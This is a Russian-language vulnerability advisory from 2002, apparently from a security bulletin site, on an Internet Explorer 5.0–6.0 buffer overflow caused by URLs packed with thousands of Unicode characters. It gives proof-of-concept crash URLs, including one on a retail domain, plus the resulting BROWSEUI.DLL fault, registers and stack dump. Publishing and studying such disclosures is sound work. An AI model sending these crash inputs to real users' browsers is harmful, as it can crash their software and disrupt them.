Переполнение буфера в IE 5.0-6.0 используя Unicode символы

Дата публикации:	18.04.2002
Всего просмотров:	1147
Опасность:
Наличие исправления:
Количество уязвимостей:	1
CVE ID:	Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:
Описание:	Микрософт Internet Explorer терпит крах при доступе к URL, содержащему чрезмерное число unicode символов. Причина происходящего не известна. Не возможно воспроизвести эту проблему на всех средах, включая две различные системы, выполняющие ту же самую версию операционной системы Windows с той же самой версией Internet Explorer. Пример 1: about:ááááááááááááááááááááááááá[2.041 GREEK CHARS]ââââââââââââââââââá http://áááááááááááááááááááááááááááááâââââââââââ[2.041 GREEK CHARS]äááá gopher://áááááááááááááááááá[2.041 GREEK CHARS]ááääääääääääääóóóóóóóååå Произойдет следующая ошибка: IEXPLORE caused an invalid page fault in module BROWSEUI.DLL at 015f:710283c0. Registers: EAX=cececece CS=015f EIP=710283c0 EFLGS=00010282 EBX=00000000 SS=0167 ESP=0058a054 EBP=0058bce0 ECX=817364ec DS=0167 ESI=0058b8d0 FS=3897 EDX=00000000 ES=0167 EDI=00000000 GS=0000 Bytes at CS:EIP: ff 70 08 ff 75 0c ff 15 a0 14 02 71 89 5d f8 8d Stack dump: cececece 00421464 00420858 00000000 00620061 0075006f 003a0074 00b100ce 00b100ce 00b100ce 00b100ce 00b100ce 00b100ce 00b100ce 00b100ce 00b100ce Пример 2: http://www.bestbuy.com.cy/cgi-bin/buy.storefront/<<<áx1388>>>/Product/View/CMPL_00_GDXbox Уязвимость найдена в Interner explorer 5.0-6.0
Ссылки:	Источник Источник 2

Переполнение буфера в IE 5.0-6.0 используя Unicode символы

Подпишитесь на email рассылку